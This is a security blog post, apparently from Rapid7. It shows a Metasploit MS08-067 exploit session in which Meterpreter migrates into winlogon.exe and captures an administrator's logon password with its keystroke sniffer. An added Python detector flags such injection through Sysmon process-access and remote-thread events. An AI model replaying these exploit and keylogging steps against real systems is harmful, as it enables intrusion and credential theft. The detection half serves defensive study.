Capturing Logon Credentials with Meterpreter

Mar 22, 2009 | 1 min read | Rapid7
Last updated at Wed, 27 Sep 2017 15:27:00 GMT

In my previous post, I described the keystroke sniffing capabilities of the Meterpreter payload. One of the key restrictions of this feature is that it can only sniff while running inside a process with interactive access to the desktop. In the case of the MS08-067 exploit, we had to migrate into Explorer.exe in order to capture the logged-on user's keystrokes.

While testing the keystroke sniffer, it occurred to me to migrate into the Winlogon.exe process instead. This process should also have interactive access to the desktop; however, when I tried to sniff the active user's keystrokes this way, it was not successful. Although Winlogon could not access the logged-on user's desktop through GetAsyncKeyState, it can capture the username and password of anyone logging in at the target's console. The example below demonstrates this process:

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability...
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

 PID  Name          Path
 ---  ----          ----
 292  wscntfy.exe   C:\WINDOWS\system32\wscntfy.exe
 316  Explorer.EXE  C:\WINDOWS\Explorer.EXE
 356  smss.exe      \SystemRoot\System32\smss.exe
 416  csrss.exe     \??\C:\WINDOWS\system32\csrss.exe
 440  winlogon.exe  \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]

meterpreter > migrate 440
[*] Migrating to 440...
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer...

[ wait for user login ]

meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator <Tab> s3cretp4ss <Return>
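From the defender's side, a `migrate 440` like the one above leaves a distinctive trace in endpoint telemetry: a process that is not part of the logon subsystem opens winlogon.exe with write and thread-creation rights and then starts a thread inside it, which Sysmon records as Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread). The detector below is an added example for this post, not code from the original article or from the Metasploit project; the simplified key="value" record format, the sample records, and the one-entry allow-list are all assumptions.

```python
import re

# Windows PROCESS_* access-right bits that together let one process write
# code into another and run it there (the rights a migration needs).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

WINLOGON = r"c:\windows\system32\winlogon.exe"
# Assumption: the only image expected to open winlogon.exe with these rights;
# deliberately minimal and meant to be tuned per environment.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

def parse_event(line):
    """Parse a simplified key="value" Sysmon-style record into a dict."""
    return dict(FIELD_RE.findall(line))

def is_winlogon_injection(event):
    """Return an alert string if this Event ID 8/10 record targets winlogon."""
    source = event.get("SourceImage", "").lower()
    if event.get("TargetImage", "").lower() != WINLOGON:
        return None
    eid = event.get("EventID")
    if eid == "8":  # CreateRemoteThread into winlogon is never routine
        return f"remote thread created in winlogon.exe by {source}"
    if eid == "10" and source not in ALLOWED_SOURCES:
        granted = int(event.get("GrantedAccess", "0"), 16)
        if granted & INJECT_MASK:
            return f"winlogon.exe opened with 0x{granted:X} by {source}"
    return None

def scan(lines):
    """Run every record through the detector and keep the alerts."""
    return [a for a in map(is_winlogon_injection, map(parse_event, lines)) if a]

# Constructed sample records (not real Sysmon output): a routine handle open
# by csrss, a query-only open by Task Manager, and a migration out of a
# service host: full-access open followed by a remote thread.
SAMPLE_LOG = [
    'EventID="10" SourceImage="C:\\WINDOWS\\system32\\csrss.exe" TargetImage="C:\\WINDOWS\\system32\\winlogon.exe" GrantedAccess="0x1FFFFF"',
    'EventID="10" SourceImage="C:\\WINDOWS\\system32\\taskmgr.exe" TargetImage="C:\\WINDOWS\\system32\\winlogon.exe" GrantedAccess="0x1000"',
    'EventID="10" SourceImage="C:\\WINDOWS\\system32\\svchost.exe" TargetImage="C:\\WINDOWS\\system32\\winlogon.exe" GrantedAccess="0x1F0FFF"',
    'EventID="8" SourceImage="C:\\WINDOWS\\system32\\svchost.exe" TargetImage="C:\\WINDOWS\\system32\\winlogon.exe"',
]
if __name__ == "__main__":
    print("\n".join(scan(SAMPLE_LOG)))
```

Only the two records from the service host produce alerts; the csrss open is allow-listed and the Task Manager open lacks any write or thread right.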
